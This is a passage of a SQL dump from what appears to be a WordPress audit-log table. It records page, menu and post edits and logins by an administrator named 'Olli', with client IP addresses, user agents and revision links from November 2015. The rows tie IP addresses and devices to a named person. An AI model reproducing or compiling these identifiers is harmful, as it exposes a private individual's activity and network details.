Safari/537.36'),(1491,274,'CurrentUserID','2'),(1492,274,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1493,275,'PostID','382'),(1494,275,'PostType','page'),(1495,275,'PostTitle','Abkürzungen'),(1496,275,'PostUrl','http://www.ollital.de/wordpress/?page_id=382'),(1497,275,'ClientIP','195.128.40.90'),(1498,275,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1499,275,'CurrentUserID','2'),(1500,275,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1501,276,'PostID','382'),(1502,276,'PostType','page'),(1503,276,'PostTitle','Abkürzungen'),(1504,276,'PostUrl','http://www.ollital.de/wordpress/?page_id=382'),(1505,276,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=383'),(1506,276,'ClientIP','195.128.40.90'),(1507,276,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1508,276,'CurrentUserID','2'),(1509,276,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1510,277,'Username','Olli'),(1511,277,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1512,277,'ClientIP','195.128.40.90'),(1513,277,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1514,278,'PostID','382'),(1515,278,'PostType','page'),(1516,278,'PostTitle','Abkürzungen'),(1517,278,'PostUrl','http://www.ollital.de/wordpress/index.php/abkurzungen/'),(1518,278,'ClientIP','195.128.40.90'),(1519,278,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1520,278,'CurrentUserID','2'),(1521,278,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1522,279,'PostID','382'),(1523,279,'PostType','page'),(1524,279,'PostTitle','Abkürzungen'),(1525,279,'PostUrl','http://www.ollital.de/wordpress/index.php/abkurzungen/'),(1526,279,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=383'),(1527,279,'ClientIP','195.128.40.90'),(1528,279,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1529,279,'CurrentUserID','2'),(1530,279,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1531,280,'Username','Olli'),(1532,280,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1533,280,'ClientIP','195.128.40.90'),(1534,280,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1535,281,'PostID','165'),(1536,281,'PostType','nav_menu_item'),(1537,281,'PostTitle','Home'),(1538,281,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/home/'),(1539,281,'RevisionLink',''),(1540,281,'ClientIP','195.128.40.90'),(1541,281,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1542,281,'CurrentUserID','2'),(1543,281,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1544,282,'PostID','167'),(1545,282,'PostType','nav_menu_item'),(1546,282,'PostTitle',''),(1547,282,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/167/'),(1548,282,'RevisionLink',''),(1549,282,'ClientIP','195.128.40.90'),(1550,282,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1551,282,'CurrentUserID','2'),(1552,282,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1553,283,'PostID','168'),(1554,283,'PostType','nav_menu_item'),(1555,283,'PostTitle',''),(1556,283,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/168/'),(1557,283,'RevisionLink',''),(1558,283,'ClientIP','195.128.40.90'),(1559,283,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1560,283,'CurrentUserID','2'),(1561,283,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1562,284,'PostID','384'),(1563,284,'PostType','nav_menu_item'),(1564,284,'PostTitle',''),(1565,284,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/384/'),(1566,284,'RevisionLink',''),(1567,284,'ClientIP','195.128.40.90'),(1568,284,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1569,284,'CurrentUserID','2'),(1570,284,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1571,285,'PostID','165'),(1572,285,'PostType','nav_menu_item'),(1573,285,'PostTitle','Home'),(1574,285,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/home/'),(1575,285,'RevisionLink',''),(1576,285,'ClientIP','195.128.40.90'),(1577,285,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1578,285,'CurrentUserID','2'),(1579,285,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1580,286,'PostID','167'),(1581,286,'PostType','nav_menu_item'),(1582,286,'PostTitle',''),(1583,286,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/167/'),(1584,286,'RevisionLink',''),(1585,286,'ClientIP','195.128.40.90'),(1586,286,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1587,286,'CurrentUserID','2'),(1588,286,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1589,287,'PostID','168'),(1590,287,'PostType','nav_menu_item'),(1591,287,'PostTitle',''),(1592,287,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/168/'),(1593,287,'RevisionLink',''),(1594,287,'ClientIP','195.128.40.90'),(1595,287,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1596,287,'CurrentUserID','2'),(1597,287,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1598,288,'PostID','384'),(1599,288,'PostType','nav_menu_item'),(1600,288,'PostTitle',''),(1601,288,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/384/'),(1602,288,'RevisionLink',''),(1603,288,'ClientIP','195.128.40.90'),(1604,288,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1605,288,'CurrentUserID','2'),(1606,288,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1607,289,'Username','Olli'),(1608,289,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1609,289,'ClientIP','195.128.40.90'),(1610,289,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1611,290,'Username','Olli'),(1612,290,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1613,290,'ClientIP','195.128.40.90'),(1614,290,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1615,291,'Username','Olli'),(1616,291,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1617,291,'ClientIP','195.128.40.90'),(1618,291,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1619,292,'PostID','380'),(1620,292,'PostType','tablepress_table'),(1621,292,'PostTitle','Abkürzungen'),(1622,292,'PostUrl','http://www.ollital.de/wordpress/?post_type=tablepress_table&p=380'),(1623,292,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=381'),(1624,292,'ClientIP','195.128.40.90'),(1625,292,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1626,292,'CurrentUserID','2'),(1627,292,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1628,293,'Username','Olli'),(1629,293,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1630,293,'ClientIP','195.128.40.90'),(1631,293,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1632,294,'PostID','165'),(1633,294,'PostType','nav_menu_item'),(1634,294,'PostTitle','Home'),(1635,294,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/home/'),(1636,294,'RevisionLink',''),(1637,294,'ClientIP','195.128.40.90'),(1638,294,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1639,294,'CurrentUserID','2'),(1640,294,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1641,295,'PostID','167'),(1642,295,'PostType','nav_menu_item'),(1643,295,'PostTitle',''),(1644,295,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/167/'),(1645,295,'RevisionLink',''),(1646,295,'ClientIP','195.128.40.90'),(1647,295,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1648,295,'CurrentUserID','2'),(1649,295,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1650,296,'PostID','168'),(1651,296,'PostType','nav_menu_item'),(1652,296,'PostTitle',''),(1653,296,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/168/'),(1654,296,'RevisionLink',''),(1655,296,'ClientIP','195.128.40.90'),(1656,296,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1657,296,'CurrentUserID','2'),(1658,296,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1659,297,'PostID','384'),(1660,297,'PostType','nav_menu_item'),(1661,297,'PostTitle',''),(1662,297,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/384/'),(1663,297,'RevisionLink',''),(1664,297,'ClientIP','195.128.40.90'),(1665,297,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1666,297,'CurrentUserID','2'),(1667,297,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1668,298,'PostID','165'),(1669,298,'PostType','nav_menu_item'),(1670,298,'PostTitle','Home'),(1671,298,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/home/'),(1672,298,'RevisionLink',''),(1673,298,'ClientIP','195.128.40.90'),(1674,298,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1675,298,'CurrentUserID','2'),(1676,298,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1677,299,'PostID','384'),(1678,299,'PostType','nav_menu_item'),(1679,299,'PostTitle',''),(1680,299,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/384/'),(1681,299,'RevisionLink',''),(1682,299,'ClientIP','195.128.40.90'),(1683,299,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1684,299,'CurrentUserID','2'),(1685,299,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1686,300,'PostID','167'),(1687,300,'PostType','nav_menu_item'),(1688,300,'PostTitle',''),(1689,300,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/167/'),(1690,300,'RevisionLink',''),(1691,300,'ClientIP','195.128.40.90'),(1692,300,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1693,300,'CurrentUserID','2'),(1694,300,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1695,301,'PostID','168'),(1696,301,'PostType','nav_menu_item'),(1697,301,'PostTitle',''),(1698,301,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/168/'),(1699,301,'RevisionLink',''),(1700,301,'ClientIP','195.128.40.90'),(1701,301,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1702,301,'CurrentUserID','2'),(1703,301,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1704,302,'Username','Olli'),(1705,302,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1706,302,'ClientIP','195.128.40.90'),(1707,302,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1708,303,'Username','Olli'),(1709,303,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1710,303,'ClientIP','195.128.40.90'),(1711,303,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1712,304,'Username','Olli'),(1713,304,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1714,304,'ClientIP','176.6.121.162'),(1715,304,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1716,305,'PostID','386'),(1717,305,'PostType','post'),(1718,305,'PostTitle','Auto Draft'),(1719,305,'OldDate','2015-11-26 16:04:31'),(1720,305,'NewDate','2015-11-26 16:05:10'),(1721,305,'ClientIP','176.6.121.162'),(1722,305,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1723,305,'CurrentUserID','2'),(1724,305,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1725,306,'PostID','386'),(1726,306,'PostType','post'),(1727,306,'PostTitle','GMW 26.11.2015'),(1728,306,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1729,306,'RevisionLink',''),(1730,306,'ClientIP','176.6.121.162'),(1731,306,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1732,306,'CurrentUserID','2'),(1733,306,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1734,307,'PostID','386'),(1735,307,'PostType','post'),(1736,307,'PostTitle','GMW 26.11.2015'),(1737,307,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1738,307,'RevisionLink',''),(1739,307,'ClientIP','176.6.121.162'),(1740,307,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1741,307,'CurrentUserID','2'),(1742,307,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1743,308,'PostID','386'),(1744,308,'PostType','post'),(1745,308,'PostTitle','GMW 26.11.2015'),(1746,308,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1747,308,'RevisionLink',''),(1748,308,'ClientIP','176.6.121.162'),(1749,308,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1750,308,'CurrentUserID','2'),(1751,308,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1752,309,'PostID','386'),(1753,309,'PostType','post'),(1754,309,'PostTitle','GMW 26.11.2015'),(1755,309,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1756,309,'RevisionLink',''),(1757,309,'ClientIP','176.6.121.162'),(1758,309,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1759,309,'CurrentUserID','2'),(1760,309,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1761,310,'PostID','386'),(1762,310,'PostType','post'),(1763,310,'PostTitle','GMW 26.11.2015'),(1764,310,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1765,310,'RevisionLink',''),(1766,310,'ClientIP','176.6.121.162'),(1767,310,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1768,310,'CurrentUserID','2'),(1769,310,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1770,311,'PostID','386'),(1771,311,'PostType','post'),(1772,311,'PostTitle','GMW 26.11.2015'),(1773,311,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1774,311,'RevisionLink',''),(1775,311,'ClientIP','176.6.121.162'),(1776,311,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1777,311,'CurrentUserID','2'),(1778,311,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1779,312,'PostID','386'),(1780,312,'PostType','post'),(1781,312,'PostTitle','GMW 26.11.2015'),(1782,312,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1783,312,'RevisionLink',''),(1784,312,'ClientIP','176.6.121.162'),(1785,312,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1786,312,'CurrentUserID','2'),(1787,312,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1788,313,'Username','Olli'),(1789,313,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1790,313,'ClientIP','176.6.121.162'),(1791,313,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1792,314,'PostID','386'),(1793,314,'PostType','post'),(1794,314,'PostTitle','GMW 26.11.2015'),(1795,314,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1796,314,'RevisionLink',''),(1797,314,'ClientIP','176.6.121.162'),(1798,314,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1799,314,'CurrentUserID','2'),(1800,314,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1801,315,'PostID','386'),(1802,315,'PostType','post'),(1803,315,'PostTitle','GMW 26.11.2015'),(1804,315,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1805,315,'RevisionLink',''),(1806,315,'ClientIP','176.6.121.162'),(1807,315,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1808,315,'CurrentUserID','2'),(1809,315,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1810,316,'PostID','386'),(1811,316,'PostType','post'),(1812,316,'PostTitle','GMW 26.11.2015'),(1813,316,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1814,316,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=387'),(1815,316,'ClientIP','176.6.121.162'),(1816,316,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1817,316,'CurrentUserID','2'),(1818,316,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1819,317,'Username','Olli'),(1820,317,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1821,317,'ClientIP','185.66.194.23'),(1822,317,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1823,318,'PostID','386'),(1824,318,'PostType','post'),(1825,318,'PostTitle','GMW 26.11.2015'),(1826,318,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1827,318,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=387'),(1828,318,'ClientIP','91.54.109.176'),(1829,318,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1830,318,'CurrentUserID','2'),(1831,318,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1832,319,'PostID','386'),(1833,319,'PostType','post'),(1834,319,'PostTitle','GMW 26.11.2015'),(1835,319,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1836,319,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=387'),(1837,319,'ClientIP','91.54.109.176'),(1838,319,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1839,319,'CurrentUserID','2'),(1840,319,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1841,320,'PostID','386'),(1842,320,'PostType','post'),(1843,320,'PostTitle','GMW 26.11.2015'),(1844,320,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1845,320,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=387'),(1846,320,'ClientIP','91.54.109.176'),(1847,320,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1848,320,'CurrentUserID','2'),(1849,320,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1850,321,'PostID','386'),(1851,321,'PostType','post'),(1852,321,'PostTitle','GMW 26.11.2015'),(1853,321,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1854,321,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=387'),(1855,321,'ClientIP','91.54.109.176'),(1856,321,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1857,321,'CurrentUserID','2'),(1858,321,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1859,322,'PostID','386'),(1860,322,'PostType','post'),(1861,322,'PostTitle','GMW 26.11.2015'),(1862,322,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1863,322,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=387'),(1864,322,'ClientIP','91.54.109.176'),(1865,322,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1866,322,'CurrentUserID','2'),(1867,322,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1868,323,'PostID','386'),(1869,323,'PostType','post'),(1870,323,'PostTitle','GMW 26.11.2015'),(1871,323,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1872,323,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=387'),(1873,323,'ClientIP','91.54.109.176'),(1874,323,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1875,323,'CurrentUserID','2'),(1876,323,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1877,324,'PostID','386'),(1878,324,'PostType','post'),(1879,324,'PostTitle','GMW 26.11.2015'),(1880,324,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1881,324,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=387'),(1882,324,'ClientIP','91.54.109.176'),(1883,324,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1884,324,'CurrentUserID','2'),(1885,324,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1886,325,'PostID','386'),(1887,325,'PostType','post'),(1888,325,'PostTitle','GMW 26.11.2015'),(1889,325,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1890,325,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=387'),(1891,325,'ClientIP','91.54.109.176'),(1892,325,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1893,325,'CurrentUserID','2'),(1894,325,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1895,326,'PostID','386'),(1896,326,'PostType','post'),(1897,326,'PostTitle','GMW 26.11.2015'),(1898,326,'OldCategories','Gebäudemanagement'),(1899,326,'NewCategories','Gebäudemanagement, Haushalt'),(1900,326,'ClientIP','91.54.109.176'),(1901,326,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1902,326,'CurrentUserID','2'),(1903,326,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1904,327,'PostID','386'),(1905,327,'PostType','post'),(1906,327,'PostTitle','GMW 26.11.2015'),(1907,327,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1908,327,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=388'),(1909,327,'ClientIP','91.54.109.176'),(1910,327,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1911,327,'CurrentUserID','2'),(1912,327,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1913,328,'Username','Olli'),(1914,328,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1915,328,'ClientIP','91.54.109.176'),(1916,328,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1917,329,'PostID','386'),(1918,329,'PostType','post'),(1919,329,'PostTitle','GMW 